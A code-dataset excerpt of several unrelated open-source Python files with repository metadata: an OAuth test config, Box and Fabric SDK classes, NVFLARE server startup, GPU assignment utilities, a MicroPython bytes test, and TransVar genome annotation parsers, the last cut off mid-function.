'location': re.compile(r'^\w{2}$'),
'name': conf.user_name,
'nickname': None,
'phone': None,
'picture': re.compile(r'^https://media.licdn.com/mpr/mprx/[\w_-]+$'),
'postal_code': None,
'timezone': None,
'username': None,
},
'content_should_contain': [
conf.user_country,
conf.user_email,
conf.user_first_name,
conf.user_id,
conf.user_last_name,
conf.user_name,
# User info JSON keys
'code', 'country', 'emailAddress', 'firstName', 'formattedName', 'id',
'lastName', 'location', 'name', 'pictureUrl', 'publicProfileUrl',
],
# Case insensitive
'content_should_not_contain':
conf.no_birth_date +
conf.no_city +
conf.no_gender +
conf.no_locale +
conf.no_nickname +
conf.no_phone +
conf.no_postal_code +
conf.no_timezone +
conf.no_username,
# True means that any truthy value is expected
'credentials': {
'token_type': None,
'provider_type_id': '2-9',
'_expiration_time': True,
'consumer_key': None,
'provider_id': None,
'consumer_secret': None,
'token': True,
'token_secret': None,
'_expire_in': True,
'provider_name': 'linkedin',
'refresh_token': None,
'provider_type': 'authomatic.providers.oauth2.OAuth2',
'refresh_status': constants.CREDENTIALS_REFRESH_NOT_SUPPORTED,
},
}
|
880bab4e4f22fd0a8f487c6df885a4f3d45f5dfa
|
9577725de28e621e4b0ec275251a2b2e7ecb0261
|
/boxsdk/object/event.py
|
c18424c2aaac3d219790f2529bb1445833f7009f
|
[
"Apache-2.0"
] |
permissive
|
box/box-python-sdk
|
0b7014d69da14baacf9ac777c347664b924325b5
|
4f11d7596488194fc740936fe987f42864003d41
|
refs/heads/main
| 2023-08-17T04:33:23.692675
| 2023-08-11T11:24:36
| 2023-08-11T11:24:36
| 30,386,388
| 424
| 285
|
Apache-2.0
| 2023-09-14T11:43:27
| 2015-02-06T00:30:55
|
Python
|
UTF-8
|
Python
| false
| false
| 140
|
py
|
event.py
|
from .api_json_object import APIJSONObject
class Event(APIJSONObject):
"""Represents a single Box event."""
_item_type = 'event'
|
973aa55403d9182492c5b570e9ad171b5810fb0d
|
53a378e41f734a730c71815dd025b0f0b55b3ec6
|
/hfc/util/keyvaluestore.py
|
95a488800388467f573363b8f4af01b2d505ee01
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
hyperledger/fabric-sdk-py
|
9db7635ed2c106395dbae0e5ffddee130c1f5afc
|
0ca510569229217f81fb093682c38e1b4a0cd7c6
|
refs/heads/main
| 2023-08-24T06:13:49.843521
| 2023-03-20T18:33:01
| 2023-03-30T23:57:34
| 67,946,893
| 439
| 292
|
Apache-2.0
| 2023-06-10T19:07:14
| 2016-09-11T18:26:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,783
|
py
|
keyvaluestore.py
|
# Copyright IBM Corp. 2016 All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from abc import ABCMeta, abstractmethod
import rx
import six
@six.add_metaclass(ABCMeta)
class KeyValueStore(object):
""" An key value store for blockchain application state persistence. """
@abstractmethod
def set_value(self, key, value):
"""Set a value with a specific key.
:param key: key
:param value: value
"""
@abstractmethod
def get_value(self, key):
"""Get a value with a specific key.
:param key: key
:return: value
"""
@abstractmethod
def async_set_value(self, key, value, scheduler=None):
"""Set a value with a specific key.
:param scheduler: scheduler
:param key: key
:param value: value
:return:a future object
"""
@abstractmethod
def async_get_value(self, key, scheduler=None):
"""Get a value with a specific key.
:param scheduler: scheduler
:param key: key
:return:a future object
"""
class FileKeyValueStore(KeyValueStore):
""" A key value store implementation based file system. """
def __init__(self, path):
"""Init the file key value store.
:param path: path of key value store
:return:
"""
self.path = path
_make_dir(path)
def set_value(self, key, value):
"""Set a value with a specific key.
Args:
key: key
value: value
Returns: True when success
Raises: File manipulate exceptions
"""
file_path = os.path.join(self.path, key)
with open(file_path, 'w') as f:
f.write(value)
return True
def get_value(self, key):
"""Get a value with a specific key.
:param key: key
:return: value
"""
try:
file_path = os.path.join(self.path, key)
with open(file_path) as f:
return f.read()
except IOError:
return None
def async_get_value(self, key, scheduler=None):
"""Get a value with a specific key.
:param scheduler: scheduler
:param key: key
:return:a future object
"""
return rx.start(lambda: self.get_value(key), scheduler)
def async_set_value(self, key, value, scheduler=None):
"""Set a value with a specific key.
:param scheduler: scheduler
:param key: key
:param value: value
:return:a future object
"""
return rx.start(lambda: self.set_value(key, value), scheduler)
def get_attrs(self):
return ",".join("{}={}"
.format(k, getattr(self, k))
for k in self.__dict__.keys())
def __str__(self):
return "[{}:{}]".format(self.__class__.__name__, self.get_attrs())
def _make_dir(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def file_key_value_store(path):
"""Factory method for creating file key value store.
:param path: path
:return an instance of file key value store
"""
return FileKeyValueStore(path)
|
2f6c0265ada5c332796bb9fe6bbec4f94ef4bfab
|
7f24023d365e013ec0924844c1a872edfb0c75b4
|
/pyxb/bundles/opengis/iso19139/v20070417/gco.py
|
94f530efcf32213ff94b19f1d115506ff5ee32a4
|
[
"Python-2.0",
"MIT",
"Apache-2.0"
] |
permissive
|
pabigot/pyxb
|
cd42c024607572c6363682d389e9296caf3f2857
|
5ee5ba54c9f702dc9c9efc2731ee547ecd4dae4a
|
refs/heads/next
| 2023-05-11T03:23:19.599756
| 2023-04-29T20:38:15
| 2023-04-29T20:45:13
| 20,547,850
| 130
| 63
|
Apache-2.0
| 2021-08-19T16:52:18
| 2014-06-06T01:49:03
|
Python
|
UTF-8
|
Python
| false
| false
| 62
|
py
|
gco.py
|
from pyxb.bundles.opengis.iso19139.v20070417.raw.gco import *
|
1a0e27ad3def68364cc5de5e8916ed964c09b50c
|
e210c28eeed9d38eb78c14b3a6388eca1e0e85d8
|
/nvflare/private/fed/app/server/server_train.py
|
6da0de4ded7c5aba2bb69b56d92f8bc1f25ae483
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/NVFlare
|
5a2d2e4c85a3fd0948e25f1ba510449727529a15
|
1433290c203bd23f34c29e11795ce592bc067888
|
refs/heads/main
| 2023-08-03T09:21:32.779763
| 2023-07-05T21:17:16
| 2023-07-05T21:17:16
| 388,876,833
| 442
| 140
|
Apache-2.0
| 2023-09-14T19:12:35
| 2021-07-23T17:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 5,786
|
py
|
server_train.py
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated server launching script."""
import argparse
import logging
import os
import sys
import time
from nvflare.apis.fl_constant import JobConstants, SiteType, WorkspaceConstants
from nvflare.apis.workspace import Workspace
from nvflare.fuel.common.excepts import ConfigError
from nvflare.fuel.f3.mpm import MainProcessMonitor as mpm
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import AppFolderConstants
from nvflare.private.fed.app.fl_conf import FLServerStarterConfiger, create_privacy_manager
from nvflare.private.fed.app.utils import create_admin_server
from nvflare.private.fed.server.server_status import ServerStatus
from nvflare.private.fed.utils.fed_utils import add_logfile_handler, fobs_initialize, security_init
from nvflare.private.privacy_manager import PrivacyService
from nvflare.security.logging import secure_format_exception
def main():
if sys.version_info < (3, 7):
raise RuntimeError("Please use Python 3.7 or above.")
parser = argparse.ArgumentParser()
parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
parser.add_argument(
"--fed_server", "-s", type=str, help="an aggregation server specification json file", required=True
)
parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
args = parser.parse_args()
kv_list = parse_vars(args.set)
config_folder = kv_list.get("config_folder", "")
if config_folder == "":
args.server_config = JobConstants.SERVER_JOB_CONFIG
else:
args.server_config = os.path.join(config_folder, JobConstants.SERVER_JOB_CONFIG)
# TODO:: remove env and train config since they are not core
args.env = os.path.join("config", AppFolderConstants.CONFIG_ENV)
args.train_config = os.path.join("config", AppFolderConstants.CONFIG_TRAIN)
args.config_folder = config_folder
logger = logging.getLogger()
args.log_config = None
workspace = Workspace(root_dir=args.workspace, site_name="server")
for name in [WorkspaceConstants.RESTART_FILE, WorkspaceConstants.SHUTDOWN_FILE]:
try:
f = workspace.get_file_path_in_root(name)
if os.path.exists(f):
os.remove(f)
except Exception:
print(f"Could not remove file '{name}'. Please check your system before starting FL.")
sys.exit(-1)
try:
os.chdir(args.workspace)
fobs_initialize()
conf = FLServerStarterConfiger(
workspace=workspace,
args=args,
kv_list=args.set,
)
log_level = os.environ.get("FL_LOG_LEVEL", "")
numeric_level = getattr(logging, log_level.upper(), None)
if isinstance(numeric_level, int):
logging.getLogger().setLevel(numeric_level)
logger.debug("loglevel debug enabled")
logger.info("loglevel info enabled")
logger.warning("loglevel warn enabled")
logger.error("loglevel error enabled")
logger.critical("loglevel critical enabled")
conf.configure()
log_file = workspace.get_log_file_path()
add_logfile_handler(log_file)
deployer = conf.deployer
secure_train = conf.cmd_vars.get("secure_train", False)
security_init(
secure_train=secure_train,
site_org=conf.site_org,
workspace=workspace,
app_validator=conf.app_validator,
site_type=SiteType.SERVER,
)
# initialize Privacy Service
privacy_manager = create_privacy_manager(workspace, names_only=True)
PrivacyService.initialize(privacy_manager)
admin_server = None
try:
# Deploy the FL server
services = deployer.deploy(args)
first_server = sorted(conf.config_data["servers"])[0]
# allow command to overwrite the admin_host
if conf.cmd_vars.get("host", None):
first_server["admin_host"] = conf.cmd_vars["host"]
admin_server = create_admin_server(
services,
server_conf=first_server,
args=args,
secure_train=secure_train,
)
admin_server.start()
services.set_admin_server(admin_server)
# mpm.add_cleanup_cb(admin_server.stop)
finally:
deployer.close()
logger.info("Server started")
# From Python 3.9 and above, the ThreadPoolExecutor does not allow submit() to create a new thread while the
# main thread has exited. Use the ServerStatus.SHUTDOWN to keep the main thread waiting for the gRPC
# server to be shutdown.
while services.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
if admin_server:
admin_server.stop()
services.engine.close()
except ConfigError as e:
logger.exception(f"ConfigError: {secure_format_exception(e)}")
raise e
if __name__ == "__main__":
"""
This is the main program when starting the NVIDIA FLARE server process.
"""
mpm.run(main_func=main)
|
b65ffee007d5cde790b3d2d40fe7b65dfff158cb
|
9edbe7b1ec03b557aa8f5b8fc6b7623bdb9151b3
|
/sample_factory/utils/gpu_utils.py
|
d94673f30cc6895deda4b1aabfa322591d4e47eb
|
[
"MIT"
] |
permissive
|
alex-petrenko/sample-factory
|
77c0370ef73902c5530acec7cb49cc1eff224173
|
7e1e69550f4de4cdc003d8db5bb39e186803aee9
|
refs/heads/master
| 2023-07-24T17:27:10.924055
| 2023-06-30T12:09:31
| 2023-06-30T12:09:31
| 192,824,415
| 644
| 99
|
MIT
| 2023-07-17T08:50:05
| 2019-06-20T00:59:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,428
|
py
|
gpu_utils.py
|
import os
from typing import List, Optional
import torch
from sample_factory.utils.get_available_gpus import get_gpus_without_triggering_pytorch_cuda_initialization
from sample_factory.utils.utils import log
CUDA_ENVVAR = "CUDA_VISIBLE_DEVICES"
def set_global_cuda_envvars(cfg):
if CUDA_ENVVAR not in os.environ:
if cfg.device == "cpu":
available_gpus = ""
else:
available_gpus = get_gpus_without_triggering_pytorch_cuda_initialization(os.environ)
os.environ[CUDA_ENVVAR] = available_gpus
log.info(f"Environment var {CUDA_ENVVAR} is {os.environ[CUDA_ENVVAR]}")
def get_available_gpus() -> List[int]:
"""
Returns indices of GPUs specified by CUDA_VISIBLE_DEVICES.
"""
orig_visible_devices = os.environ[f"{CUDA_ENVVAR}"]
available_gpus = [int(g.strip()) for g in orig_visible_devices.split(",") if g and not g.isspace()]
return available_gpus
def gpus_for_process(process_idx: int, num_gpus_per_process: int, gpu_mask: Optional[List[int]] = None) -> List[int]:
"""
Returns indices of GPUs to use for a process. These indices already respect the CUDA_VISIBLE_DEVICES envvar.
I.e. if CUDA_VISIBLE_DEVICES is '1,2,3', then from torch's there are three visible GPUs
with indices 0, 1, and 2.
Therefore, in this case gpus_for_process(0, 1) returns [0], gpus_for_process(1, 1) returns [1], etc.
"""
available_gpus = get_available_gpus()
if gpu_mask is not None:
assert len(available_gpus) >= len(
gpu_mask
), f"Number of available GPUs ({len(available_gpus)}) is less than number of GPUs in mask ({len(gpu_mask)})"
available_gpus = [available_gpus[g] for g in gpu_mask]
num_gpus = len(available_gpus)
gpus_to_use = []
if num_gpus == 0:
return gpus_to_use
first_gpu_idx = process_idx * num_gpus_per_process
for i in range(num_gpus_per_process):
index_mod_num_gpus = (first_gpu_idx + i) % num_gpus
gpus_to_use.append(index_mod_num_gpus)
log.debug(
f"Using GPUs {gpus_to_use} for process {process_idx} (actually maps to GPUs {[available_gpus[g] for g in gpus_to_use]})"
)
return gpus_to_use
def set_gpus_for_process(process_idx, num_gpus_per_process, process_type, gpu_mask=None):
# in this function we want to limit the number of GPUs visible to the process, i.e. if
# CUDA_VISIBLE_DEVICES is '1,2,3' and we want to use GPU index 2, then we want to set
# CUDA_VISIBLE_DEVICES to '3' for this process
gpus_to_use = gpus_for_process(process_idx, num_gpus_per_process, gpu_mask)
if not gpus_to_use:
os.environ[CUDA_ENVVAR] = ""
log.debug("Not using GPUs for %s process %d", process_type, process_idx)
else:
available_gpus = get_available_gpus()
cuda_devices_to_use = ",".join([str(available_gpus[g]) for g in gpus_to_use])
os.environ[CUDA_ENVVAR] = cuda_devices_to_use
log.info(
"Set environment var %s to %r (GPU indices %r) for %s process %d",
CUDA_ENVVAR,
os.environ[CUDA_ENVVAR],
gpus_to_use,
process_type,
process_idx,
)
log.debug("Num visible devices: %r", torch.cuda.device_count())
return gpus_to_use
# TODO: do we need this func?
def cuda_envvars_for_policy(policy_id, process_type):
set_gpus_for_process(policy_id, 1, process_type)
|
1445ff4a7981ffe618dce401e09f10f450923a7b
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/int_bytes.py
|
d42afac1fd4ecf4e3ee5f9b6c99084455dcc3555
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 1,303
|
py
|
int_bytes.py
|
print((10).to_bytes(1, "little"))
print((-10).to_bytes(1, "little", signed=True))
# Test fitting in length that's not a power of two.
print((0x10000).to_bytes(3, 'little'))
print((111111).to_bytes(4, "little"))
print((-111111).to_bytes(4, "little", signed=True))
print((100).to_bytes(10, "little"))
print((-100).to_bytes(10, "little", signed=True))
# check that extra zero bytes don't change the internal int value
print(int.from_bytes(bytes(20), "little") == 0)
print(int.from_bytes(b"\x01" + bytes(20), "little") == 1)
# big-endian conversion
print((10).to_bytes(1, "big"))
print((-10).to_bytes(1, "big", signed=True))
print((100).to_bytes(10, "big"))
print((-100).to_bytes(10, "big", signed=True))
print(int.from_bytes(b"\0\0\0\0\0\0\0\0\0\x01", "big"))
print(int.from_bytes(b"\x01\0", "big"))
# negative number of bytes should raise an error
try:
(1).to_bytes(-1, "little")
except ValueError:
print("ValueError")
# too small buffer should raise an error
try:
(256).to_bytes(1, "little")
except OverflowError:
print("OverflowError")
# negative numbers should raise an error if signed=False
try:
(-256).to_bytes(2, "little")
except OverflowError:
print("OverflowError")
try:
(-256).to_bytes(2, "little", signed=False)
except OverflowError:
print("OverflowError")
|
833f1e7f7d9f960e689f8e18af5171a0012ce401
|
80529a0e7959d1165c14b8cfb2c61262d293421a
|
/transvar/parser.py
|
a6ca397e0177e3d4aa6339dbb21a02e6a98698b9
|
[
"MIT"
] |
permissive
|
zwdzwd/transvar
|
32f126524d996832bb1e0153c0c5ec2575ff9b20
|
f7c17a8def902c00c403066fce791c3ad4eeb355
|
refs/heads/master
| 2023-04-29T17:36:43.585077
| 2022-01-11T19:35:55
| 2022-01-11T19:35:55
| 50,932,056
| 120
| 39
|
NOASSERTION
| 2023-04-19T22:39:27
| 2016-02-02T15:55:41
|
Python
|
UTF-8
|
Python
| false
| false
| 23,250
|
py
|
parser.py
|
"""
The MIT License
Copyright (c) 2015
The University of Texas MD Anderson Cancer Center
Wanding Zhou, Tenghui Chen, Ken Chen (kchen3@mdanderson.org)
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .transcripts import *
def parse_ucsc_refgene(map_file, name2gene):
""" start 1-based, end 1-based """
cnt = 0
for line in opengz(map_file):
if line.startswith('#'): continue
fields = line.strip().split('\t')
if fields[13] != 'cmpl' or fields[14] != 'cmpl':
continue
gene_name = fields[12].upper()
if gene_name in name2gene:
gene = name2gene[gene_name]
else:
gene = Gene(name=gene_name)
name2gene[gene_name] = gene
t = Transcript()
t.name = fields[1]
t.chrm = normalize_chrm(fields[2])
t.strand = fields[3]
t.beg = int(fields[4])+1
t.end = int(fields[5])
t.cds_beg = int(fields[6])+1
t.cds_end = int(fields[7])
t.source = 'UCSC_refGene'
ex_begs, ex_ends = fields[9], fields[10]
for ex_beg, ex_end in zip([int(x)+1 for x in ex_begs.strip(',').split(',')],
list(map(int, ex_ends.strip(',').split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort() # keep exons sorted
gene.tpts.append(t)
t.gene = gene
cnt += 1
err_print('loaded %d transcripts from UCSC refgene.' % cnt)
return
def parse_ucsc_refgene_customized(map_file, name2gene):
""" start 1-based, end 1-based """
cnt = 0
for line in open(map_file):
fields = line.strip().split()
gene_name = fields[0].upper()
if gene_name in name2gene:
gene = name2gene[gene_name]
else:
gene = Gene(name=gene_name)
name2gene[gene_name] = gene
t = Transcript()
t.chrm = normalize_chrm(fields[1])
t.strand = fields[2]
t.beg = int(fields[3])
t.end = int(fields[4])
t.seq = fields[-1]
t.cds_beg = int(fields[5])
t.cds_end = int(fields[6])
t.source = 'custom'
t.name = '.'
ex_begs, ex_ends = fields[8], fields[9]
for ex_beg, ex_end in zip(list(map(int, ex_begs.split(','))),
list(map(int, ex_ends.split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort() # keep exons sorted
gene.tpts.append(t)
t.gene = gene
cnt += 1
err_print('loaded %d transcripts from customized table.' % cnt)
return
def parse_refseq_gff(gff_fn, name2gene):
id2ent = {}
gff_fh = opengz(gff_fn)
reg = None
cnt = 0
for line in gff_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
# print line.strip()
info = dict([_.split('=') for _ in fields[8].split(';')])
if fields[2] == 'region':
if 'chromosome' in info:
reg = Region(info['chromosome'], int(fields[3]), int(fields[4]))
if 'map' in info and info['map']=='unlocalized':
reg.unlocalized = False
# else:
# reg = None
elif (reg and fields[2] == 'gene' and
('pseudo' not in info or info['pseudo'] != 'true')):
if reg.unlocalized:
continue
gene_name = info['Name'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
if hasattr(g, '_gene_id') and g._gene_id != info['ID']:
continue # if a gene_name appears twice, then all the subsequent occurrences are all ignored.
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
g._gene_id = info['ID']
g.beg = int(fields[3])
g.end = int(fields[4])
id2ent[info['ID']] = g
if 'Dbxref' in info:
g.dbxref = info['Dbxref']
elif (fields[2] in ['mRNA', 'ncRNA', 'rRNA', 'tRNA']
and 'Parent' in info and info['Parent'] in id2ent):
if reg.unlocalized:
continue
if fields[2] == 'mRNA':
fields[2] = 'protein_coding'
if fields[2] == 'ncRNA' and 'ncrna_class' in info:
fields[2] = info['ncrna_class']
t = Transcript(transcript_type=fields[2])
t.chrm = normalize_chrm(reg.name)
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = info['Name'] if 'Name' in info else info['product']
t.gene = id2ent[info['Parent']]
t.gene.tpts.append(t)
t.source = 'RefSeq'
id2ent[info['ID']] = t
cnt += 1
elif fields[2] == 'exon' and info['Parent'] in id2ent:
if reg.unlocalized:
continue
t = id2ent[info['Parent']]
if (isinstance(t, Gene)):
g = t
if not hasattr(g, 'gene_t'):
g.gene_t = Transcript()
g.tpts.append(g.gene_t)
g.gene_t.chrm = normalize_chrm(reg.name)
g.gene_t.strand = fields[6]
g.gene_t.gene = g
g.gene_t.beg = g.beg
g.gene_t.end = g.end
g.gene_t.source = 'RefSeq'
cnt += 1
t = g.gene_t
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS' and info['Parent'] in id2ent:
if reg.unlocalized:
continue
t = id2ent[info['Parent']]
if (isinstance(t, Gene)):
g = t
if not hasattr(g, 'gene_t'):
g.gene_t = Transcript()
g.tpts.append(g.gene_t)
g.gene_t.chrm = normalize_chrm(reg.name)
g.gene_t.strand = fields[6]
g.gene_t.gene = g
g.gene_t.beg = g.beg
g.gene_t.end = g.end
g.gene_t.source = 'RefSeq'
cnt += 1
t = g.gene_t
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from RefSeq GFF3 file." % cnt)
def parse_ensembl_gtf(gtf_fn, name2gene):
"""
This parses the new GTF after or equal to hg19.
The function does not handle hg18.
gtf file is gffv2
parser does not assume order in the GTF file
"""
gtf_fh = opengz(gtf_fn)
id2ent = {}
cnt = 0
for line in gtf_fh:
if line.startswith('#'):
continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
# info = dict([_.split('=') for _ in fields[8].split(';')])
if fields[2] == 'gene':
gene_id = info['gene_id']
if gene_id not in id2ent:
id2ent[gene_id] = Gene(gene_type=info['gene_biotype'])
g = id2ent[gene_id]
if 'gene_name' in info:
g.name = info['gene_name'].upper()
else:
g.name = gene_id
if g.name not in name2gene: name2gene[g.name] = g
g.beg = int(fields[3])
g.end = int(fields[4])
elif fields[2] == 'transcript':
# there exits two transcript format in ensembl gtf
# the old version has no 'transcript_biotype'
# the equivalent transcript_biotype is fields[1]
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = info['transcript_id']
gene_id = info['gene_id']
if gene_id not in id2ent:
id2ent[gene_id] = Gene(gene_type=info['gene_biotype'])
t.gene = id2ent[gene_id]
t.gene.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
elif fields[2] == 'exon':
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from Ensembl GTF file." % cnt)
def parse_ensembl_gtf_hg18(gtf_fn, name2gene):
"""
This parses the old ensembl GTF before or equal to hg18.
The function does not handle hg19 or later.
"""
gtf_fh = opengz(gtf_fn)
tid2transcript = {}
cnt = 0
for line in gtf_fh:
if line.startswith('#'):
continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
if fields[2] == "exon":
if info['transcript_id'] in tid2transcript:
t = tid2transcript[info['transcript_id']]
else:
t = Transcript(transcript_type=fields[1])
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
tid2transcript[t.name] = t
if info['gene_name'] in name2gene:
g = name2gene[info['gene_name']]
else:
g = Gene()
g.name = info['gene_name']
name2gene[g.name] = g
t.gene = g
g.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
if info['transcript_id'] in tid2transcript:
t = tid2transcript[info['transcript_id']]
else:
t = Transcript(transcript_type=fields[1])
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
tid2transcript[t.name] = t
if info['gene_name'] in name2gene:
g = name2gene[info['gene_name']]
else:
g = Gene()
g.name = info['gene_name']
name2gene[g.name] = g
t.gene = g
g.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
t.cds.append((int(fields[3]), int(fields[4])))
for t in list(tid2transcript.values()):
t.exons.sort()
t.beg = t.exons[0][0]
t.end = t.exons[-1][1]
err_print("loaded %d transcripts from Ensembl GTF file." % cnt)
def parse_ccds_table(ccds_fn, name2gene):
""" start 0-based end 0-based """
ccds_fh = open(ccds_fn)
ccds_fh.readline()
cnt = 0
for line in ccds_fh:
fields = line.strip().split('\t')
if fields[5] != 'Public':
continue
gene_name = fields[2].upper()
if gene_name not in name2gene:
name2gene[gene_name] = Gene(name=gene_name)
g = name2gene[gene_name]
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.cds_beg = int(fields[7])+1
t.cds_end = int(fields[8])+1
# without UTR information, take CDS boundary as the exon boundary
t.beg = t.cds_beg
t.end = t.cds_end
t.name = fields[4]
# note that CCDS do not annotate UTR, so all the exons are equivalently cds
t.exons = [(int(b)+1, int(e)+1) for b,e in re.findall(r"[\s\[](\d+)-(\d+)[,\]]", fields[9])]
t.source = 'CDDS'
t.gene = g
g.tpts.append(t)
cnt += 1
err_print("loaded %d transcripts from CCDS table." % cnt)
def parse_ucsc_kg_table(kg_fn, alias_fn, name2gene):
kg_fh = opengz(kg_fn)
id2aliases = {}
if alias_fn:
alias_fh = opengz(alias_fn)
for line in alias_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
if fields[0] in id2aliases:
id2aliases[fields[0]].append(fields[1])
else:
id2aliases[fields[0]] = [fields[1]]
cnt = 0
for line in kg_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
g = None
if fields[0] in id2aliases:
for alias in id2aliases[fields[0]]:
if alias in name2gene:
g = name2gene[alias]
if not g:
g = Gene(name=fields[0])
for alias in id2aliases[fields[0]]:
name2gene[alias] = g
else:
if fields[0] in name2gene:
g = name2gene[fields[0]]
else:
g = Gene(name=fields[0])
name2gene[fields[0]] = g
t = Transcript()
t.name = fields[0]
t.chrm = normalize_chrm(fields[1])
t.strand = fields[2]
t.beg = int(fields[3])
t.end = int(fields[4])
t.cds_beg = int(fields[5])
t.cds_end = int(fields[6])
t.source = 'UCSC_knownGene'
ex_begs, ex_ends = fields[8], fields[9]
for ex_beg, ex_end in zip(list(map(int, ex_begs.strip(',').split(','))),
list(map(int, ex_ends.strip(',').split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort()
g.tpts.append(t)
t.gene = g
cnt += 1
err_print("loaded %d transcripts from UCSC knownGene table." % cnt)
def parse_gencode_gtf(gencode_fn, name2gene):
id2ent = {}
gencode_fh = opengz(gencode_fn)
cnt = 0
for line in gencode_fh:
# if cnt > 1000:
# break
if line.startswith('#'): continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
if fields[2] == 'gene':
gene_name = info['gene_name'].upper()
gid = info['gene_id']
if gene_name in name2gene:
g = name2gene[gene_name]
id2ent[gid] = g
else:
if gid not in id2ent:
id2ent[gid] = Gene(name=gene_name, gene_type=info['gene_type'])
g = id2ent[gid]
name2gene[gene_name] = g
g.beg = int(fields[3])
g.end = int(fields[4])
# if info['gene_type'] == 'pseudogene':
# g.pseudo = True
elif fields[2] == 'transcript':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
t = id2ent[tid]
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = tid
gid = info['gene_id']
if gid not in id2ent:
id2ent[gid] = Gene(gene_type=info['gene_type'])
t.gene = id2ent[gid]
t.gene.tpts.append(t)
t.source = 'GENCODE'
id2ent[t.name] = t
cnt += 1
elif fields[2] == 'exon':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
t = id2ent[tid]
